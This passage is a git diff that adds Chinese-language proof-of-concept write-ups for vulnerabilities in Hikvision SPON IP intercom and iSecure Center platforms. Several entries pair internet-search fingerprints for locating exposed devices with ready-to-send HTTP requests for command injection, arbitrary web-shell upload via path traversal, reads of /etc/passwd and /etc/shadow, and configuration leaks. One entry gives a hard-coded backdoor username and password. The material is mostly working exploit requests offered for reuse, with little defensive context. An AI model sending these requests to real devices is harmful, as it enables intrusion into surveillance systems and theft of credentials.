+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+
+jsondata[filename]=./ocx.json
+```
+
+![1704944421700-582b17ab-4acb-41dc-b15d-ecb1594c9772.png](./img/0U2NLRBKAT56CH1C/1704944421700-582b17ab-4acb-41dc-b15d-ecb1594c9772-780698.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/irhi1snf5yt1z0se>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md b/海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md
new file mode 100644
index 0000000..1a2aaf0
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md
@@ -0,0 +1,37 @@
+# 海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露漏洞，攻击者可通过该漏洞在服务器端读取账户密码，从而登录后台。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/wypAhO4pJ8vtvSv5/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-817066.png)
+
+# 四、漏洞复现
+```java
+POST /php/getuserdata.php HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+
+jsondata[pageIndex]=0&jsondata[pageCount]=30
+```
+
+![1704936814754-a5e79495-da6d-46f1-a20e-6e0045c4f7af.png](./img/wypAhO4pJ8vtvSv5/1704936814754-a5e79495-da6d-46f1-a20e-6e0045c4f7af-132521.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb9bbzrsxkw7v8t7>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md b/海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md
new file mode 100644
index 0000000..baf4b3a
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md
@@ -0,0 +1,34 @@
+# 海康威视SPON IP网络对讲广播系统index存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统index存在信息泄露漏洞，攻击者可通过该漏洞在服务器端读取账户密码，从而登录后台。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/ZQoNFDtBj3VElRjU/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-912720.png)
+
+# 四、漏洞复现
+```java
+GET /js/index.js?t=0.1 HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1704944865462-8df9d69d-9782-4600-a55a-b0e4d4aac452.png](./img/ZQoNFDtBj3VElRjU/1704944865462-8df9d69d-9782-4600-a55a-b0e4d4aac452-356579.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ladsou0vl281yvr7>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md
new file mode 100644
index 0000000..3237ab7
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md
@@ -0,0 +1,53 @@
+# 海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传漏洞，恶意攻击者可能会上传恶意的后门文件，使服务器失陷。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/eeomSk6Be4UoNr4r/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-443930.png)
+
+# 四、漏洞复现
+```java
+/upload/upload.html
+```
+
+![1704857171496-32b9c84a-3439-4941-90e7-dc4b2f2264e6.png](./img/eeomSk6Be4UoNr4r/1704857171496-32b9c84a-3439-4941-90e7-dc4b2f2264e6-022312.png)
+
+```java
+POST /upload/my_parser.php HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8dsf2vRYZDVPaW9m
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Length: 139243
+
+------WebKitFormBoundary8dsf2vRYZDVPaW9m
+Content-Disposition: form-data; name="upload"; filename="tt.php"
+Content-Type: image/jpeg
+
+1111111
+------WebKitFormBoundary8dsf2vRYZDVPaW9m--
+```
+
+![1704857288482-ca32fb5c-937a-4ecf-b86c-91a298e5a38a.png](./img/eeomSk6Be4UoNr4r/1704857288482-ca32fb5c-937a-4ecf-b86c-91a298e5a38a-336677.png)
+
+上传文件位置
+
+```java
+/upload/files/tt.php
+```
+
+![1704857320066-c828b2fe-fc1c-4f32-a9b1-3ae9e5d73100.png](./img/eeomSk6Be4UoNr4r/1704857320066-c828b2fe-fc1c-4f32-a9b1-3ae9e5d73100-761362.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dgm1h4giy6i2k3ys>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md b/海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md
new file mode 100644
index 0000000..f81fe75
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md
@@ -0,0 +1,42 @@
+# 海康威视SPON IP网络对讲广播系统rj_get_token存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getjson存在任意文件读取漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/gQEXNUCoyilRb96r/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-931102.png)
+
+# 四、漏洞复现
+```plain
+POST /php/rj_get_token.php HTTP/1.1
+Host: 
+Content-Length: 120
+Sec-Ch-Ua: 
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Sec-Ch-Ua-Mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+Sec-Ch-Ua-Platform: ""
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+jsondata[url]=rj_get_token.php
+```
+
+![1705237594033-ec2aca8a-b9a8-4417-86e2-fae5df5aaeec.png](./img/gQEXNUCoyilRb96r/1705237594033-ec2aca8a-b9a8-4417-86e2-fae5df5aaeec-314646.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sshgiyaupb6l0y7c>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md
new file mode 100644
index 0000000..68e444c
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 海康威视SPON IP网络对讲广播系统uploadjson存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传漏洞，恶意攻击者可能会上传恶意的后门文件，使服务器失陷。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/09hL4VLsS-pV3aEb/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-455066.png)
+
+# 四、漏洞复现
+```java
+POST /php/uploadjson.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+
+jsondata[filename]=111.php&jsondata[data]=<?php phpinfo();?>
+```
+
+![1704870723907-3a79bc40-1174-49ae-86cc-f54a7fc7d35a.png](./img/09hL4VLsS-pV3aEb/1704870723907-3a79bc40-1174-49ae-86cc-f54a7fc7d35a-772590.png)
+
+上传文件位置
+
+```java
+/lan/111.php
+```
+
+![1704870773380-20e41fa5-0e94-4700-a7e1-9e7a2cbca2e3.png](./img/09hL4VLsS-pV3aEb/1704870773380-20e41fa5-0e94-4700-a7e1-9e7a2cbca2e3-143365.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/riyq6veg7akk2qpx>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md b/海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md
new file mode 100644
index 0000000..a60ec7a
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md
@@ -0,0 +1,30 @@
+# 海康威视SPON IP网络对讲广播系统存在后门账号漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统存在后门账号漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ Hunter：`web.body="vendors/custom/html5.min.js"`
++ 特征
+
+![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/rr6KagZV-W624Z1G/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-592211.png)
+
+# 四、漏洞复现
+后门账号在代码中写死的
+
+```java
+后门账号：
+administrator/800823
+```
+
+![1704871100509-de3f1070-d8a7-4e6d-a1c0-1b9219a4e64a.png](./img/rr6KagZV-W624Z1G/1704871100509-de3f1070-d8a7-4e6d-a1c0-1b9219a4e64a-580031.png)
+
+![1704871179647-001e8c87-cbe9-4899-8f1a-ff82ee3a1bff.png](./img/rr6KagZV-W624Z1G/1704871179647-001e8c87-cbe9-4899-8f1a-ff82ee3a1bff-773611.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rimo5nnt3a0yraea>
\ No newline at end of file
diff --git a/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md b/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md
new file mode 100644
index 0000000..2559c47
--- /dev/null
+++ b/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md
@@ -0,0 +1,49 @@
+# 海康威视SPON IP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895)
+
+# 一、漏洞简介
+Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
+
+# 二、影响版本
++ 海康威视SPON IP网络对讲广播系统
+
+# 三、资产测绘
++ fofa`icon_hash="-1830859634"`
++ 特征
+
+![1703683596082-c644fff9-438a-460f-891f-450ad725c4bd.png](./img/zkv4X8uRv86yGSaP/1703683596082-c644fff9-438a-460f-891f-450ad725c4bd-280274.png)
+
+# 四、漏洞复现
+```plain
+POST /php/ping.php HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: {hostname}
+Content-Length: 40
+Content-Type: application/x-www-form-urlencoded
+
+jsondata[ip]=a|echo stc&jsondata[type]=1
+```
+
+![1703683644604-a5807506-f785-435a-b533-2746677fe24b.png](./img/zkv4X8uRv86yGSaP/1703683644604-a5807506-f785-435a-b533-2746677fe24b-391178.png)
+
+```plain
+POST /php/ping.php HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: {hostname}
+Content-Length: 40
+Content-Type: application/x-www-form-urlencoded
+
+jsondata[ip]=a|whoami&jsondata[type]=1
+```
+
+![1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a.png](./img/zkv4X8uRv86yGSaP/1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a-426020.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oi2zyivh6brw6t9s>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md b/海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md
new file mode 100644
index 0000000..b55be10
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md
@@ -0,0 +1,76 @@
+# 海康威视iSecure Center综合安防管理平台center任意文件上传漏洞
+
+# 1、漏洞描述
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞</font>
+
+# <font style="color:rgb(0, 0, 0);">2、影响版本</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台 </font>
+
+![1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49.png](./img/QD4KsFbI2-Z4evtl/1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49-481067.png)
+
+# <font style="color:rgb(0, 0, 0);">3、资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+# 4、漏洞复现
+## POC1
+漏洞地址：`/center/api/files;.js`
+
+```java
+POST /center/api/files;.js HTTP/1.1
+Host: 127.0.0.1
+User-Agent: python-requests/2.26.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Length: 257
+Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c
+
+--ea26cdac4990498b32d7a95ce5a5135c
+Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.jsp"
+Content-Type: application/octet-stream
+
+332299402
+--ea26cdac4990498b32d7a95ce5a5135c--
+```
+
+![1691858525729-8505d3a1-1815-44de-ba94-bf36c31e5c62.png](./img/QD4KsFbI2-Z4evtl/1691858525729-8505d3a1-1815-44de-ba94-bf36c31e5c62-308053.png)
+
+上传后的文件位置`/clusterMgr/1.jsp;.js`
+
+```plain
+https://xx.xx.xx.xx/clusterMgr/153107606.jsp;.js
+```
+
+![1691858698425-bf786d03-8a91-461c-8cbc-ea6ab174e23e.png](./img/QD4KsFbI2-Z4evtl/1691858698425-bf786d03-8a91-461c-8cbc-ea6ab174e23e-251565.png)
+
+## POC2
+```plain
+POST /center/api/files;.html HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
+
+------WebKitFormBoundary9PggsiM755PLa54a
+Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
+Content-Type: application/zip
+
+<%out.print("test3");%>
+
+------WebKitFormBoundary9PggsiM755PLa54a--
+```
+
+![1691866428821-18013ca7-2c86-4b10-a27b-a8265441742c.png](./img/QD4KsFbI2-Z4evtl/1691866428821-18013ca7-2c86-4b10-a27b-a8265441742c-260468.png)
+
+上传文件位置
+
+```plain
+https://xx.xx.xx.xx/portal/ui/login/..;/..;/new.jsp
+```
+
+![1691866500572-0f02ac1e-89f5-4396-9fc1-0c232006d77a.png](./img/QD4KsFbI2-Z4evtl/1691866500572-0f02ac1e-89f5-4396-9fc1-0c232006d77a-407509.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fg3xig9qvdpm4qbg>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md
new file mode 100644
index 0000000..644b1ac
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md
@@ -0,0 +1,30 @@
+# 海康威视iSecure Center综合安防管理平台 config.properties信息泄漏漏洞
+
+# 一、漏洞简介
+HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取等敏感信息进一步攻击。
+
+# 二、影响版本
++ HIKVISION 综合安防管理平台
+
+# 三、<font style="color:rgb(0, 0, 0);">资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/Cfz58EmYVbCTQdd3/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-961023.png)
+
++ 登录页面
+
+![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/Cfz58EmYVbCTQdd3/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-085091.png)
+
+# 四、漏洞复现
+```plain
+/portal/conf/config.properties
+```
+
+![1698592701679-7048f5ce-cf66-4e17-927a-006bcaf9ea9c.png](./img/Cfz58EmYVbCTQdd3/1698592701679-7048f5ce-cf66-4e17-927a-006bcaf9ea9c-458685.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uwdr74gfask18f9t>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md b/海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md
new file mode 100644
index 0000000..57c44c0
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 海康威视iSecure Center 综合安防管理平台download任意文件读取漏洞
+
+# 1、漏洞描述
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure Center 综合安防管理平台download任意文件读取漏洞</font>
+
+# <font style="color:rgb(0, 0, 0);">2、影响版本</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台 </font>
+
+![1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae.png](./img/YR0nPcEELd6uSCWt/1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae-599682.png)
+
+# <font style="color:rgb(0, 0, 0);">3、资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+fofa：`title="综合安防管理平台"`
+
+# 4、漏洞复现
+```java
+GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/shadow HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![1717149873962-7544801a-20c4-4831-a338-b486e5c32913.png](./img/YR0nPcEELd6uSCWt/1717149873962-7544801a-20c4-4831-a338-b486e5c32913-126761.png)
+
+
+
+> 更新: 2024-06-01 11:04:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/soa7px4tqz4enpdm>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md
new file mode 100644
index 0000000..97ab47f
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md
@@ -0,0 +1,36 @@
+# 海康威视iSecure Center综合安防管理平台 env 信息泄漏漏洞
+
+# 一、漏洞简介
+HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取环境env等敏感信息进一步攻击。
+
+# 二、影响版本
++ HIKVISION 综合安防管理平台
+
+# 三、<font style="color:rgb(0, 0, 0);">资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/5PVxXecoDXiJN_Eu/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-751749.png)
+
++ 登录页面
+
+![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/5PVxXecoDXiJN_Eu/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-764837.png)
+
+# 四、漏洞复现
+```plain
+/artemis-portal/artemis/env 
+```
+
+![1691858136518-4966819b-3613-4ebc-8d53-8709141c80dc.png](./img/5PVxXecoDXiJN_Eu/1691858136518-4966819b-3613-4ebc-8d53-8709141c80dc-455276.png)
+
+```plain
+/artemis/env
+```
+
+![1699978989500-f123cba1-ae00-40f3-907f-7c9e9706db80.png](./img/5PVxXecoDXiJN_Eu/1699978989500-f123cba1-ae00-40f3-907f-7c9e9706db80-476150.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/swlt25g5lx4t9rg6>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md b/海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md
new file mode 100644
index 0000000..4827c7e
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md
@@ -0,0 +1,34 @@
+# 海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure Center 综合安防管理平台files 接口存在任意文件读取漏洞，攻击者可通过该漏洞读取服务器上任意文件，获取敏感信息。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ <font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台</font>
+
+# <font style="color:rgb(0, 0, 0);">三、</font><font style="color:rgb(0, 0, 0);">资产测绘</font>
+**hunter查询语法：**
+
+`<font style="color:rgb(0, 0, 0);">app.name=="Hikvision 海康威视 iSecure Center"</font>`
+
+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/OAqEWr4K1U6jmvTP/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-092169.png)
+
++ <font style="color:rgb(0, 0, 0);">登录页面</font>
+
+![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/OAqEWr4K1U6jmvTP/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-321706.png)
+
+# <font style="color:rgb(0, 0, 0);">四、漏洞复现</font>
+```plain
+GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate, br
+```
+
+![1701837056180-c3c2c99a-7025-482f-a16a-a184ea9b0619.png](./img/OAqEWr4K1U6jmvTP/1701837056180-c3c2c99a-7025-482f-a16a-a184ea9b0619-784391.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/unwcbu4dxgpzlizn>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md
new file mode 100644
index 0000000..ffbecd1
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md
@@ -0,0 +1,38 @@
+# 海康威视iSecure Center综合安防管理平台findcomponent泄漏漏洞
+
+# 一、漏洞简介
+HIKVISION 综合安防管理平台component存在信息泄漏漏洞，攻击者通过漏洞可以获取环境等敏感信息进一步攻击。
+
+# 二、影响版本
++ HIKVISION 综合安防管理平台
+
+# 三、<font style="color:rgb(0, 0, 0);">资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/4D8_uhrkeXQMXsJC/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-549805.png)
+
++ 登录页面
+
+![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/4D8_uhrkeXQMXsJC/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-064945.png)
+
+# 四、漏洞复现
+```java
+GET /bic/caService/v1/certificate/machine/component HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
